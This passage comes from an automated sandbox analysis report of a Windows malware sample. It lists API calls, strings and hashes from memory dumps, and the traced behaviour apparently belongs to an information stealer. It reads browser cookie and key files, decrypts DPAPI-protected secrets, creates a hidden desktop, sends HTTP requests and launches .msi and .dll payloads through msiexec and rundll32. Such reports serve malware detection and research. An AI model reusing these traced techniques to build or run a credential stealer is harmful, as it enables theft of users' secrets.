                                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                            • API String ID: 689835475-3542011879
                                            • Opcode ID: 736881a50dba6b8905840eac4370110c5d051842a78476ee018cd8b30cadbd96
                                            • Instruction ID: dd0e0b2e904cac6dcb4644251d8498bdcd69e700431b121c7f08c254ac6fdba9
                                            • Opcode Fuzzy Hash: 736881a50dba6b8905840eac4370110c5d051842a78476ee018cd8b30cadbd96
                                            • Instruction Fuzzy Hash: 97517E71D10518ABCB14EBE0EC55FEE7738AF14306F40456AF106A70D1EB78AA48CF69
                                            APIs
                                              • Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D
                                              • Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AA1
                                              • Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AB8
                                              • Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4ACF
                                              • Part of subcall function 023F4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 023F4AF0
                                              • Part of subcall function 023F4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 023F4B00
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 023F5CAF
                                            • StrCmpCA.SHLWAPI(?,006D6E80), ref: 023F5CCA
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 023F5E4A
                                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421B50,00000000,?,006D6AF0,00000000,?,006D6CF0,00000000,?,00421B4C), ref: 023F6128
                                            • lstrlen.KERNEL32(00000000), ref: 023F6139
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 023F614A
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023F6151
                                            • lstrlen.KERNEL32(00000000), ref: 023F6166
                                            • memcpy.MSVCRT(?,00000000,00000000), ref: 023F617D
                                            • lstrlen.KERNEL32(00000000), ref: 023F618F
                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 023F61A8
                                            • memcpy.MSVCRT(?), ref: 023F61B5
                                            • lstrlen.KERNEL32(00000000,?,?), ref: 023F61D2
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 023F61E6
                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 023F6203
                                            • InternetCloseHandle.WININET(00000000), ref: 023F6267
                                            • InternetCloseHandle.WININET(00000000), ref: 023F6274
                                            • HttpOpenRequestA.WININET(00000000,006D6E9C,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 023F5EAF
                                              • Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
                                              • Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
                                              • Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                              • Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
                                              • Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9
                                            • InternetCloseHandle.WININET(00000000), ref: 023F627E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                            • String ID:
                                            • API String ID: 1703137719-0
                                            • Opcode ID: 2a3c1412926e8dcb65fac1fead3eb2460a9c625ebd483e9c6d5746682fc61762
                                            • Instruction ID: 684484681605fba1bd2d882ca17cadbe3bf280bae558768242b9d2ab14ecab37
                                            • Opcode Fuzzy Hash: 2a3c1412926e8dcb65fac1fead3eb2460a9c625ebd483e9c6d5746682fc61762
                                            • Instruction Fuzzy Hash: EA12AF71951228ABCB15EBA1DCD4FEEB37ABF54701F5045AEE246620D0EF706A88CF50
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00A70D60,00000000,?,00421544,00000000,?,?), ref: 0040CB6C
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CB89
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CB95
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CBA8
                                            • ??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CBB5
                                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CBD9
                                            • StrStrA.SHLWAPI(?,00A70EB0,00420B56), ref: 0040CBF7
                                            • StrStrA.SHLWAPI(00000000,00A70DA8), ref: 0040CC1E
                                            • StrStrA.SHLWAPI(?,00A714D0,00000000,?,00421550,00000000,?,00000000,00000000,?,00A6DC90,00000000,?,0042154C,00000000,?), ref: 0040CDA2
                                            • StrStrA.SHLWAPI(00000000,00A71510), ref: 0040CDB9
                                              • Part of subcall function 0040C920: memset.MSVCRT ref: 0040C953
                                              • Part of subcall function 0040C920: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00A6DBB0), ref: 0040C971
                                              • Part of subcall function 0040C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
                                              • Part of subcall function 0040C920: memcpy.MSVCRT(?,?,?), ref: 0040CA12
                                            • StrStrA.SHLWAPI(?,00A71510,00000000,?,00421554,00000000,?,00000000,00A6DBB0), ref: 0040CE5A
                                            • StrStrA.SHLWAPI(00000000,00A6DE10), ref: 0040CE71
                                              • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
                                              • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
                                              • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78
                                            • lstrlenA.KERNEL32(00000000), ref: 0040CF44
                                            • CloseHandle.KERNEL32(00000000), ref: 0040CF9C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                            • String ID:
                                            • API String ID: 1564132460-3916222277
                                            • Opcode ID: 319ad7b4aa2611097864e6b9fb105a892de663381b2c54de453d8c226baa0bf7
                                            • Instruction ID: 4fdc336044367871c69213567fe42fce90f61d04e08d5fff212e48b059342ccf
                                            • Opcode Fuzzy Hash: 319ad7b4aa2611097864e6b9fb105a892de663381b2c54de453d8c226baa0bf7
                                            • Instruction Fuzzy Hash: 2AE13E71D05108ABCB14EBA1DCA6FEEB779AF14304F00419EF10663191EF387A99CB69
                                            APIs
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                              • Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
                                              • Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                              • Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
                                              • Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
                                              • Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,006D703C,00000000,?,00421544,00000000,?,?), ref: 023FCDD3
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 023FCDF0
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 023FCDFC
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 023FCE0F
                                            • ??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 023FCE1C
                                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 023FCE40
                                            • StrStrA.SHLWAPI(?,006D6BB0,00420B56), ref: 023FCE5E
                                            • StrStrA.SHLWAPI(00000000,006D6D64), ref: 023FCE85
                                            • StrStrA.SHLWAPI(?,006D6ED0,00000000,?,00421550,00000000,?,00000000,00000000,?,006D6B5C,00000000,?,0042154C,00000000,?), ref: 023FD009
                                            • StrStrA.SHLWAPI(00000000,006D6ECC), ref: 023FD020
                                              • Part of subcall function 023FCB87: memset.MSVCRT ref: 023FCBBA
                                              • Part of subcall function 023FCB87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 023FCBD8
                                              • Part of subcall function 023FCB87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 023FCBE3
                                              • Part of subcall function 023FCB87: memcpy.MSVCRT(?,?,?), ref: 023FCC79
                                            • StrStrA.SHLWAPI(?,006D6ECC,00000000,?,00421554,00000000,?,00000000,006D6ADC), ref: 023FD0C1
                                            • StrStrA.SHLWAPI(00000000,006D6FA8), ref: 023FD0D8
                                              • Part of subcall function 023FCB87: lstrcat.KERNEL32(?,00420B47), ref: 023FCCAA
                                              • Part of subcall function 023FCB87: lstrcat.KERNEL32(?,00420B4B), ref: 023FCCBE
                                              • Part of subcall function 023FCB87: lstrcat.KERNEL32(?,00420B4E), ref: 023FCCDF
                                            • lstrlen.KERNEL32(00000000), ref: 023FD1AB
                                            • CloseHandle.KERNEL32(00000000), ref: 023FD203
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                            • String ID:
                                            • API String ID: 1564132460-3916222277
                                            • Opcode ID: 855bc2773a8edbe2702640e8442d81e0a176fb990623bce130120e5cf956bf83
                                            • Instruction ID: 28eb7b18c92e8ed7297033b4dd627bacb0cc9ca9f9ccbe0661e9b14651a59e7a
                                            • Opcode Fuzzy Hash: 855bc2773a8edbe2702640e8442d81e0a176fb990623bce130120e5cf956bf83
                                            • Instruction Fuzzy Hash: FEE1F171D40228ABCB15EBA5DC94FEEB77AAF54704F40416EF246661D0EF306A89CF50
                                            APIs
                                            • memset.MSVCRT ref: 023FA0AE
                                              • Part of subcall function 02408F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,023F1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02408F7D
                                            • wsprintfA.USER32 ref: 023FA0E6
                                            • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 023FA10A
                                            • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 023FA133
                                            • memset.MSVCRT ref: 023FA154
                                            • lstrcat.KERNEL32(00000000,?), ref: 023FA16A
                                            • lstrcat.KERNEL32(00000000,?), ref: 023FA17E
                                            • lstrcat.KERNEL32(00000000,004212D8), ref: 023FA190
                                            • memset.MSVCRT ref: 023FA1A4
                                            • lstrcpy.KERNEL32(?,00000000), ref: 023FA1E3
                                            • memset.MSVCRT ref: 023FA203
                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 023FA26B
                                            • Sleep.KERNEL32(00001388), ref: 023FA27A
                                            • CloseDesktop.USER32(00000000), ref: 023FA2C7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
                                            • String ID: D
                                            • API String ID: 1347862506-2746444292
                                            • Opcode ID: 129a72e408785f324dac0317533ad1fd853fd10515b731b54cc373586fca86ea
                                            • Instruction ID: efaceb02cb6923c0f97202a323295747fe5d60bc1b7eecec2be0d569b3558b50
                                            • Opcode Fuzzy Hash: 129a72e408785f324dac0317533ad1fd853fd10515b731b54cc373586fca86ea
                                            • Instruction Fuzzy Hash: F7516FB1D04318ABDB24DB60DC89FD97779AF48700F0045A9F60DAA2D0EB759B88CF55
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • RegOpenKeyExA.ADVAPI32(00000000,00A6E360,00000000,00020019,00000000,004205BE), ref: 00418534
                                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                            • wsprintfA.USER32 ref: 004185E9
                                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                            • RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                                            • String ID: - $%s\%s$?
                                            • API String ID: 3246050789-3278919252
                                            • Opcode ID: 93c83181ebae43ba24f8ba122f93400849cec83954c63ab8cf28178e69971814
                                            • Instruction ID: c228fa157c9b2873a9233ab8a396ad333d8a8ae6667b392d6015aff843962e7d
                                            • Opcode Fuzzy Hash: 93c83181ebae43ba24f8ba122f93400849cec83954c63ab8cf28178e69971814
                                            • Instruction Fuzzy Hash: 47812D71911118ABDB24DB50DD95FEAB7B9BF08314F1082DEE10966180DF746BC8CFA9
                                            APIs
                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004191FC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateGlobalStream
                                            • String ID: `dAF$`dAF$image/jpeg
                                            • API String ID: 2244384528-2462684518
                                            • Opcode ID: babf49ba20920563954b4310973f8f88ddc30fd05da4e819fe27d77726b3164b
                                            • Instruction ID: 5957f6d1424668cbfb95915d93d24f68315a2265fb4ab52f55d04562dbc5d918
                                            • Opcode Fuzzy Hash: babf49ba20920563954b4310973f8f88ddc30fd05da4e819fe27d77726b3164b
                                            • Instruction Fuzzy Hash: BE710E71E11208ABDB14EFE4DC95FEEB779BF48300F10851AF516A7290EB34A944CB65
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                              • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,00A72600), ref: 00406353
                                              • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                              • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,00A72080,00000000,00000000,00400100,00000000), ref: 004063D5
                                              • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                              • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
                                            • lstrlenA.KERNEL32(00000000), ref: 0041557F
                                              • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
                                            • lstrlenA.KERNEL32(00000000), ref: 004155D3
                                            • strtok.MSVCRT(00000000,?), ref: 004155EE
                                            • lstrlenA.KERNEL32(00000000), ref: 004155FE
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$lXA
                                            • API String ID: 3532888709-2643084821
                                            • Opcode ID: 904f5d64da91e06ead0d936d340dde400ebc5da841b4e9b86dfd7fc02f15ceb4
                                            • Instruction ID: 990a636b304bf614e487c778196146b6daa8d27d3f5f6fae7c13381180e093e6
                                            • Opcode Fuzzy Hash: 904f5d64da91e06ead0d936d340dde400ebc5da841b4e9b86dfd7fc02f15ceb4
                                            • Instruction Fuzzy Hash: B7518030A11148EBCB14FF61DDA6AED7339AF10354F50442EF50A671A1EF386B94CB5A
                                            APIs
                                            • strtok_s.MSVCRT ref: 00411557
                                            • strtok_s.MSVCRT ref: 004119A0
                                              • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,00A6DD90,?,004210F4,?,00000000), ref: 0041AB3B
                                              • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strtok_s$lstrcpylstrlen
                                            • String ID:
                                            • API String ID: 348468850-0
                                            • Opcode ID: 06649906eb56a75e707e76c73bf3ad7756cc6685bc2ad0a2cf06ec6a6bcab578
                                            • Instruction ID: 972b35e280e46cb9f8f2efccef7ae82ad5cc4b0fb079cf0b80f28d4141883f35
                                            • Opcode Fuzzy Hash: 06649906eb56a75e707e76c73bf3ad7756cc6685bc2ad0a2cf06ec6a6bcab578
                                            • Instruction Fuzzy Hash: 98C1D1B5A011089BCB14EF60DC99FDA7379AF58308F00449EF509A7282EB34EAD5CF95
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00413415
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 004135AD
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0041373A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExecuteShell$lstrcpy
                                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                            • API String ID: 2507796910-3625054190
                                            • Opcode ID: 26c152d7f96a75462af708fb0be05a9bf32e82651be1c71a9be3783b36db2b02
                                            • Instruction ID: 9b621e5b28039e8226f92625bb5802f9f58bb257d03f06fe20f9cf3dfd15236c
                                            • Opcode Fuzzy Hash: 26c152d7f96a75462af708fb0be05a9bf32e82651be1c71a9be3783b36db2b02
                                            • Instruction Fuzzy Hash: 271241719011189ACB14FBA1DDA2FEDB739AF14314F00419FF10666196EF382B99CFA9
                                            APIs
                                            • memset.MSVCRT ref: 004144EE
                                            • memset.MSVCRT ref: 00414505
                                              • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0041453C
                                            • lstrcatA.KERNEL32(?,00A70B98), ref: 0041455B
                                            • lstrcatA.KERNEL32(?,?), ref: 0041456F
                                            • lstrcatA.KERNEL32(?,00A71048), ref: 00414583
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                              • Part of subcall function 0040A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
                                              • Part of subcall function 0040A430: memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2
                                              • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                              • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                              • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                              • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                              • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                              • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                              • Part of subcall function 00419550: GlobalAlloc.KERNEL32(00000000,0041462D,0041462D), ref: 00419563
                                            • StrStrA.SHLWAPI(?,00A72008), ref: 00414643
                                            • GlobalFree.KERNEL32(?), ref: 00414762
                                              • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                              • Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                              • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                              • Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                              • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                            • lstrcatA.KERNEL32(?,00000000), ref: 004146F3
                                            • StrCmpCA.SHLWAPI(?,004208D2), ref: 00414710
                                            • lstrcatA.KERNEL32(00000000,00000000), ref: 00414722
                                            • lstrcatA.KERNEL32(00000000,?), ref: 00414735
                                            • lstrcatA.KERNEL32(00000000,00420FA0), ref: 00414744
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                            • String ID:
                                            • API String ID: 1191620704-0
                                            • Opcode ID: 56b0e3791313187faecf28fb1c308eeb638c5f4e19ec101d569dba3e0703b254
                                            • Instruction ID: a18e5ba717d90c20c2426d83a13a237c0a2f648a3df755456e30f39b11c63a78
                                            • Opcode Fuzzy Hash: 56b0e3791313187faecf28fb1c308eeb638c5f4e19ec101d569dba3e0703b254
                                            • Instruction Fuzzy Hash: B77157B6D00218ABDB14EBA0DD45FDE737AAF88304F00459DF505A6191EB38EB94CF55
                                            APIs
                                            • memset.MSVCRT ref: 02404755
                                            • memset.MSVCRT ref: 0240476C
                                              • Part of subcall function 024091D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02409202
                                            • lstrcat.KERNEL32(?,00000000), ref: 024047A3
                                            • lstrcat.KERNEL32(?,006D6D0C), ref: 024047C2
                                            • lstrcat.KERNEL32(?,?), ref: 024047D6
